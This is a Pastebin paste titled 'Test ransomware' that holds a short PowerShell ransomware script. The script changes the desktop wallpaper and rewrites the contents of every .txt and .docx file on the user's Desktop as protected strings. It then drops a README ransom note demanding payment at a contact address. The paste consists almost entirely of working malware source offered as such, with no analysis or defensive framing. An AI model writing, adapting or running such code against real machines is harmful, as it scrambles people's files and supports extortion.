SHARE
TWEET

Test ransomware

James_inthe_box Apr 24th, 2019 282 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Function Set-WallPaper($Value)
  2. {
  3.  Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $value
  4.  Start-Sleep -s 1
  5.  rundll32.exe user32.dll, UpdatePerUserSystemParameters 1, True
  6.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  7.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  8.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  9.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  10.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  11.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  12.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  13.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  14.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  15.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  16.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  17.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  18.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  19.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  20.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  21.  RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
  22. }
  23. $dir = (Get-Location).tostring() + "\wallpaper.jpg"
  24. Set-WallPaper -value $dir
  25. $path = [Environment]::GetFolderPath("Desktop")
  26. Get-ChildItem -Path $path -Recurse -Include *.txt | ForEach-Object {
  27.    $fileName = $_
  28.    $fileTmp = $path + "\tmp.txt"
  29.    $fileTmpAttributes=Get-Item $fileTmp -Force
  30.    $fileTmpAttributes.attributes="Hidden"
  31.    Write-Host $fileName
  32.    Get-Content $fileName | ForEach-Object {
  33.       $tmp = $_ | ConvertTo-SecureString -AsPlainText -Force
  34.       $result = ConvertFrom-SecureString $tmp
  35.       Add-Content $fileTmp $result
  36.    }
  37.    Start-Sleep -s 1
  38.    Clear-Content $fileName
  39.    Get-Content $fileTmp | ForEach-Object {
  40.       Add-Content $fileName $_
  41.    }
  42.    Clear-Content $fileTmp
  43.    Start-Sleep -s 1
  44. }
  45. Remove-Item -Path $fileTmp
  46. "All your personal files have been encrypted!" | Out-File -FilePath ($path+"\README.txt")
  47. Add-Content ($path+"\README.txt") "If you want restore your data, you have to pay!"
  48. Add-Content ($path+"\README.txt") "Contact us: no-reply@hacker.ahihi"
  49.  
  50. Get-ChildItem -Path $path -Recurse -Include *.docx | ForEach-Object {
  51.    $fileName = $_
  52.    $fileTmp = $path + "\tmp.txt"
  53.    $fileTmpAttributes=Get-Item $fileTmp -Force
  54.    $fileTmpAttributes.attributes="Hidden"
  55.    Write-Host $fileName
  56.    Get-Content $fileName | ForEach-Object {
  57.       $tmp = $_ | ConvertTo-SecureString -AsPlainText -Force
  58.       $result = ConvertFrom-SecureString $tmp
  59.       Add-Content $fileTmp $result
  60.    }
  61.    Start-Sleep -s 1
  62.    Clear-Content $fileName
  63.    Get-Content $fileTmp | ForEach-Object {
  64.       Add-Content $fileName $_
  65.    }
  66.    Clear-Content $fileTmp
  67.    Start-Sleep -s 1
  68. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top